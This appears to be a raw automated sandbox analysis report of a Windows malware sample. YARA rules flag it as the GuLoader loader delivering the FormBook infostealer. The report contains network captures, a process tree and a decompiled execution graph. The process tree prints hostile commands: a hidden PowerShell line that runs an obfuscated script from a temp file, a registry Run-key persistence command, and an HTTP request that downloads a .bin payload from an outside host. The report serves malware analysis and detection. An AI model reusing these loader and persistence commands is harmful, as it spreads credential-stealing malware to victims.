                                                                      Data Ascii: 5f9d<!doctype html><html dir="ltr" lang="ja" prefix="og: https://ogp.me/ns#"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="HandheldFriendly" content="True"><meta name="MobileOptimized" content="320"><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="pingback" href="http://n-benriya002.com/xmlrpc.php">...[if IE]><![endif]--><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/footer.css" type="text/css" media="screen"><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/page.css" type="text/css" media="screen">... All in One SEO 4.5.3.1 - aioseo.com --><title> | </title><meta name="robots" content="noindex" /><meta name="generator" content="All in One SEO (AIOSEO) 4.5.3.1" /><script type="application/ld+j
                                                                      Apr 25, 2024 19:26:20.767074108 CEST | 1289 | IN
                                                                      Data Ascii: son" class="aioseo-schema">{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/n-benriya002.com\/9pdo\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/n-benriya002.com\/#listItem
                                                                      Apr 25, 2024 19:26:20.767086983 CEST | 1289 | IN
                                                                      Data Ascii: lisher":{"@id":"https:\/\/n-benriya002.com\/#organization"}}]}</script>... All in One SEO --><link rel='dns-prefetch' href='//n-benriya002.com' /><link rel='dns-prefetch' href='//ajax.googleapis.com' /><link rel='dns-prefetch' href=
                                                                      Apr 25, 2024 19:26:20.767157078 CEST | 1289 | IN
                                                                      Data Ascii: data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n
                                                                      Apr 25, 2024 19:26:20.767194986 CEST | 1289 | IN
                                                                      Data Ascii: ew Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e
                                                                      Apr 25, 2024 19:26:20.767293930 CEST | 1289 | IN
                                                                      Data Ascii: tings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !im
                                                                      Apr 25, 2024 19:26:20.767318010 CEST1289INData Raw: 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d
                                                                      Data Ascii: r--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cya
                                                                      Apr 25, 2024 19:26:20.767393112 CEST1289INData Raw: 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29
                                                                      Data Ascii: radient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset-
                                                                      Apr 25, 2024 19:26:20.767798901 CEST1289INData Raw: 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20
                                                                      Data Ascii: inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-lay
                                                                      Apr 25, 2024 19:26:20.767815113 CEST1289INData Raw: 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c
                                                                      Data Ascii: color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-p
                                                                      Apr 25, 2024 19:26:21.037709951 CEST1289INData Raw: 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d
                                                                      Data Ascii: olor{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--pr


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0192.168.2.1049706195.252.110.2534437376C:\Users\user\AppData\Local\Temp\Overfondle.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-04-25 17:25:24 UTC | 176 | OUT | GET /ETfFmOW246.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: kraljevikonaci.rs
                                                                      Cache-Control: no-cache
                                                                      2024-04-25 17:25:25 UTC | 502 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 25 Apr 2024 17:25:25 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 270400
                                                                      Connection: close
                                                                      Last-Modified: Tue, 23 Apr 2024 12:41:16 GMT
                                                                      Cache-Control: max-age=2592000
                                                                      Expires: Sat, 25 May 2024 17:25:25 GMT
                                                                      Vary: Accept-Encoding
                                                                      X-Proxy-Cache: BYPASS
                                                                      Set-Cookie: uid=w/xu/WYqkgWkFxsUA/W+Ag==; expires=Sat, 25-May-24 17:25:25 GMT; domain=$host; path=/
                                                                      P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
                                                                      Accept-Ranges: bytes



                                                                      Target ID:0
                                                                      Start time:19:24:14
                                                                      Start date:25/04/2024
                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
                                                                      Imagebase:0x400000
                                                                      File size:562'306 bytes
                                                                      MD5 hash:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:19:24:15
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
                                                                      Imagebase:0x2f0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:19:24:15
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:19:24:16
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                      Imagebase:0xd70000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:19:25:08
                                                                      Start date:25/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Overfondle.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Overfondle.exe"
                                                                      Imagebase:0x400000
                                                                      File size:562'306 bytes
                                                                      MD5 hash:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 50%, ReversingLabs
                                                                      • Detection: 61%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
                                                                      Imagebase:0x7ff620390000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
                                                                      Imagebase:0xf60000
                                                                      File size:59'392 bytes
                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

Target ID: 13
Start time: 19:25:27
Start date: 25/04/2024
Path: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
Imagebase: 0xd10000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 14
Start time: 19:25:29
Start date: 25/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\cmd.exe"
Imagebase: 0xd70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 15
Start time: 19:25:42
Start date: 25/04/2024
Path: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
Imagebase: 0xd10000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 17
Start time: 19:25:54
Start date: 25/04/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff613480000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 24.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.8%
Total number of Nodes: 1402
Total number of Limit Nodes: 38
3391->3394 3393 403421 3392->3393 3392->3394 3393->3394 3395 4034c8 3394->3395 3396 406663 5 API calls 3394->3396 3397 4065f5 3 API calls 3395->3397 3396->3395 3398 4034de lstrlenA 3397->3398 3398->3395 3399 4034ee 3398->3399 3400 406663 5 API calls 3399->3400 3401 4034f5 3400->3401 3402 406663 5 API calls 3401->3402 3403 4034fc 3402->3403 3404 406663 5 API calls 3403->3404 3405 403508 #17 OleInitialize SHGetFileInfoA 3404->3405 3483 406257 lstrcpynA 3405->3483 3408 403556 GetCommandLineA 3484 406257 lstrcpynA 3408->3484 3410 403568 3411 405c14 CharNextA 3410->3411 3412 40358f CharNextA 3411->3412 3414 40359e 3412->3414 3413 403664 3415 403678 GetTempPathA 3413->3415 3414->3413 3414->3414 3420 405c14 CharNextA 3414->3420 3424 403666 3414->3424 3485 403382 3415->3485 3417 403690 3418 403694 GetWindowsDirectoryA lstrcatA 3417->3418 3419 4036ea DeleteFileA 3417->3419 3421 403382 12 API calls 3418->3421 3495 402f0c GetTickCount GetModuleFileNameA 3419->3495 3420->3414 3423 4036b0 3421->3423 3423->3419 3426 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3423->3426 3579 406257 lstrcpynA 3424->3579 3425 4036fd 3427 403792 3425->3427 3430 403782 3425->3430 3434 405c14 CharNextA 3425->3434 3429 403382 12 API calls 3426->3429 3582 403963 3427->3582 3432 4036e2 3429->3432 3523 403a3d 3430->3523 3432->3419 3432->3427 3436 403717 3434->3436 3444 4037c1 3436->3444 3445 40375c 3436->3445 3437 4037ac 3589 40596d 3437->3589 3438 4038cf 3440 4038d7 GetCurrentProcess OpenProcessToken 3438->3440 3441 40394d ExitProcess 3438->3441 3446 40391d 3440->3446 3447 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 3440->3447 3593 4058d8 3444->3593 3448 405cd7 18 API calls 3445->3448 3450 406663 5 API calls 3446->3450 3447->3446 3451 403768 3448->3451 3453 403924 3450->3453 3451->3427 3580 406257 lstrcpynA 3451->3580 3456 403939 ExitWindowsEx 3453->3456 3459 403946 3453->3459 3454 4037e2 lstrcatA lstrcmpiA 3454->3427 3458 4037fe 3454->3458 3455 4037d7 lstrcatA 
3455->3454 3456->3441 3456->3459 3461 403803 3458->3461 3462 40380a 3458->3462 3609 40140b 3459->3609 3460 403777 3581 406257 lstrcpynA 3460->3581 3596 40583e CreateDirectoryA 3461->3596 3601 4058bb CreateDirectoryA 3462->3601 3468 40380f SetCurrentDirectoryA 3469 40382a 3468->3469 3470 40381f 3468->3470 3605 406257 lstrcpynA 3469->3605 3604 406257 lstrcpynA 3470->3604 3473 4062ea 17 API calls 3474 40386c DeleteFileA 3473->3474 3475 40387a CopyFileA 3474->3475 3480 403837 3474->3480 3475->3480 3476 4038c3 3477 406030 36 API calls 3476->3477 3477->3427 3478 406030 36 API calls 3478->3480 3479 4062ea 17 API calls 3479->3480 3480->3473 3480->3476 3480->3478 3480->3479 3482 4038ae CloseHandle 3480->3482 3606 4058f0 CreateProcessA 3480->3606 3482->3480 3483->3408 3484->3410 3486 406535 5 API calls 3485->3486 3487 40338e 3486->3487 3488 403398 3487->3488 3489 405be9 3 API calls 3487->3489 3488->3417 3490 4033a0 3489->3490 3491 4058bb 2 API calls 3490->3491 3492 4033a6 3491->3492 3493 405e19 2 API calls 3492->3493 3494 4033b1 3493->3494 3494->3417 3612 405dea GetFileAttributesA CreateFileA 3495->3612 3497 402f4c 3517 402f5c 3497->3517 3613 406257 lstrcpynA 3497->3613 3499 402f72 3500 405c30 2 API calls 3499->3500 3501 402f78 3500->3501 3614 406257 lstrcpynA 3501->3614 3503 402f83 GetFileSize 3504 402f9a 3503->3504 3505 40307d 3503->3505 3504->3505 3510 4030e9 3504->3510 3504->3517 3519 402ea8 6 API calls 3504->3519 3647 403355 3504->3647 3615 402ea8 3505->3615 3507 403086 3509 4030b6 GlobalAlloc 3507->3509 3507->3517 3650 40336b SetFilePointer 3507->3650 3626 40336b SetFilePointer 3509->3626 3514 402ea8 6 API calls 3510->3514 3513 4030d1 3627 403143 3513->3627 3514->3517 3515 40309f 3518 403355 ReadFile 3515->3518 3517->3425 3520 4030aa 3518->3520 3519->3504 3520->3509 3520->3517 3522 40311a SetFilePointer 3522->3517 3524 406663 5 API calls 3523->3524 3525 403a51 3524->3525 3526 403a57 3525->3526 3527 403a69 3525->3527 3671 4061b5 wsprintfA 3526->3671 3528 40613e 3 API 
calls 3527->3528 3529 403a94 3528->3529 3531 403ab2 lstrcatA 3529->3531 3533 40613e 3 API calls 3529->3533 3532 403a67 3531->3532 3656 403d02 3532->3656 3533->3531 3536 405cd7 18 API calls 3537 403ae4 3536->3537 3538 403b6d 3537->3538 3540 40613e 3 API calls 3537->3540 3539 405cd7 18 API calls 3538->3539 3541 403b73 3539->3541 3542 403b10 3540->3542 3543 403b83 LoadImageA 3541->3543 3544 4062ea 17 API calls 3541->3544 3542->3538 3548 403b2c lstrlenA 3542->3548 3551 405c14 CharNextA 3542->3551 3545 403c29 3543->3545 3546 403baa RegisterClassA 3543->3546 3544->3543 3547 40140b 2 API calls 3545->3547 3549 403be0 SystemParametersInfoA CreateWindowExA 3546->3549 3578 403c33 3546->3578 3550 403c2f 3547->3550 3552 403b60 3548->3552 3553 403b3a lstrcmpiA 3548->3553 3549->3545 3558 403d02 18 API calls 3550->3558 3550->3578 3556 403b2a 3551->3556 3555 405be9 3 API calls 3552->3555 3553->3552 3554 403b4a GetFileAttributesA 3553->3554 3557 403b56 3554->3557 3559 403b66 3555->3559 3556->3548 3557->3552 3560 405c30 2 API calls 3557->3560 3561 403c40 3558->3561 3672 406257 lstrcpynA 3559->3672 3560->3552 3563 403c4c ShowWindow 3561->3563 3564 403ccf 3561->3564 3566 4065f5 3 API calls 3563->3566 3664 40544a OleInitialize 3564->3664 3568 403c64 3566->3568 3567 403cd5 3569 403cf1 3567->3569 3570 403cd9 3567->3570 3571 403c72 GetClassInfoA 3568->3571 3573 4065f5 3 API calls 3568->3573 3572 40140b 2 API calls 3569->3572 3576 40140b 2 API calls 3570->3576 3570->3578 3574 403c86 GetClassInfoA RegisterClassA 3571->3574 3575 403c9c DialogBoxParamA 3571->3575 3572->3578 3573->3571 3574->3575 3577 40140b 2 API calls 3575->3577 3576->3578 3577->3578 3578->3427 3579->3415 3580->3460 3581->3430 3583 40397b 3582->3583 3584 40396d CloseHandle 3582->3584 3684 4039a8 3583->3684 3584->3583 3587 405a19 67 API calls 3588 40379a OleUninitialize 3587->3588 3588->3437 3588->3438 3590 405982 3589->3590 3591 4037b9 ExitProcess 3590->3591 3592 405996 MessageBoxIndirectA 3590->3592 3592->3591 3594 406663 5 
API calls 3593->3594 3595 4037c6 lstrcatA 3594->3595 3595->3454 3595->3455 3597 403808 3596->3597 3598 40588f GetLastError 3596->3598 3597->3468 3598->3597 3599 40589e SetFileSecurityA 3598->3599 3599->3597 3600 4058b4 GetLastError 3599->3600 3600->3597 3602 4058cb 3601->3602 3603 4058cf GetLastError 3601->3603 3602->3468 3603->3602 3604->3469 3605->3480 3607 405923 CloseHandle 3606->3607 3608 40592f 3606->3608 3607->3608 3608->3480 3610 401389 2 API calls 3609->3610 3611 401420 3610->3611 3611->3441 3612->3497 3613->3499 3614->3503 3616 402eb1 3615->3616 3617 402ec9 3615->3617 3620 402ec1 3616->3620 3621 402eba DestroyWindow 3616->3621 3618 402ed1 3617->3618 3619 402ed9 GetTickCount 3617->3619 3651 40669f 3618->3651 3623 402ee7 CreateDialogParamA ShowWindow 3619->3623 3624 402f0a 3619->3624 3620->3507 3621->3620 3623->3624 3624->3507 3626->3513 3628 403159 3627->3628 3629 403187 3628->3629 3655 40336b SetFilePointer 3628->3655 3631 403355 ReadFile 3629->3631 3632 403192 3631->3632 3633 4031a4 GetTickCount 3632->3633 3634 4032ee 3632->3634 3636 4030dd 3632->3636 3633->3636 3643 4031f3 3633->3643 3635 403330 3634->3635 3640 4032f2 3634->3640 3638 403355 ReadFile 3635->3638 3636->3517 3636->3522 3637 403355 ReadFile 3637->3643 3638->3636 3639 403355 ReadFile 3639->3640 3640->3636 3640->3639 3641 405e91 WriteFile 3640->3641 3641->3640 3642 403249 GetTickCount 3642->3643 3643->3636 3643->3637 3643->3642 3644 40326e MulDiv wsprintfA 3643->3644 3646 405e91 WriteFile 3643->3646 3645 405378 24 API calls 3644->3645 3645->3643 3646->3643 3648 405e62 ReadFile 3647->3648 3649 403368 3648->3649 3649->3504 3650->3515 3652 4066bc PeekMessageA 3651->3652 3653 4066b2 DispatchMessageA 3652->3653 3654 402ed7 3652->3654 3653->3652 3654->3507 3655->3629 3657 403d16 3656->3657 3673 4061b5 wsprintfA 3657->3673 3659 403d87 3674 403dbb 3659->3674 3661 403ac2 3661->3536 3662 403d8c 3662->3661 3663 4062ea 17 API calls 3662->3663 3663->3662 3677 404320 3664->3677 3666 405494 3667 404320 
SendMessageA 3666->3667 3668 4054a6 OleUninitialize 3667->3668 3668->3567 3669 40546d 3669->3666 3680 401389 3669->3680 3671->3532 3672->3538 3673->3659 3675 4062ea 17 API calls 3674->3675 3676 403dc9 SetWindowTextA 3675->3676 3676->3662 3678 404338 3677->3678 3679 404329 SendMessageA 3677->3679 3678->3669 3679->3678 3682 401390 3680->3682 3681 4013fe 3681->3669 3682->3681 3683 4013cb MulDiv SendMessageA 3682->3683 3683->3682 3685 4039b6 3684->3685 3686 403980 3685->3686 3687 4039bb FreeLibrary GlobalFree 3685->3687 3686->3587 3687->3686 3687->3687 4590 402733 4591 402a47 4590->4591 4592 40273a 4590->4592 4593 402c17 17 API calls 4592->4593 4594 402741 4593->4594 4595 402750 SetFilePointer 4594->4595 4595->4591 4596 402760 4595->4596 4598 4061b5 wsprintfA 4596->4598 4598->4591 4599 401e35 GetDC 4600 402c17 17 API calls 4599->4600 4601 401e47 GetDeviceCaps MulDiv ReleaseDC 4600->4601 4602 402c17 17 API calls 4601->4602 4603 401e78 4602->4603 4604 4062ea 17 API calls 4603->4604 4605 401eb5 CreateFontIndirectA 4604->4605 4606 402628 4605->4606 3688 6eac105a 3691 6eac1096 3688->3691 3764 6eac17c3 GetCurrentProcess GetModuleHandleA GetProcAddress 3691->3764 3694 6eac10e4 GetModuleFileNameA GlobalAlloc 3696 6eac1127 3694->3696 3695 6eac1221 GlobalAlloc 3697 6eac1238 3695->3697 3698 6eac112c CharPrevA 3696->3698 3699 6eac1146 3696->3699 3700 6eac1250 FindWindowExA FindWindowExA 3697->3700 3712 6eac126f 3697->3712 3698->3696 3698->3699 3701 6eac1166 GetTempFileNameA CopyFileA 3699->3701 3702 6eac1150 3699->3702 3700->3712 3705 6eac11ff lstrcatA lstrlenA 3701->3705 3706 6eac1196 CreateFileA CreateFileMappingA MapViewOfFile 3701->3706 3779 6eac1ac2 3702->3779 3705->3697 3708 6eac11cb UnmapViewOfFile 3706->3708 3709 6eac11f1 CloseHandle CloseHandle 3706->3709 3708->3709 3709->3705 3711 6eac1085 3713 6eac129b lstrcmpiA 3712->3713 3769 6eac1a82 3712->3769 3774 6eac18b9 lstrlenA 3712->3774 3713->3712 3714 6eac12b0 lstrcmpiA 3713->3714 3714->3712 3715 6eac12c0 3714->3715 3716 
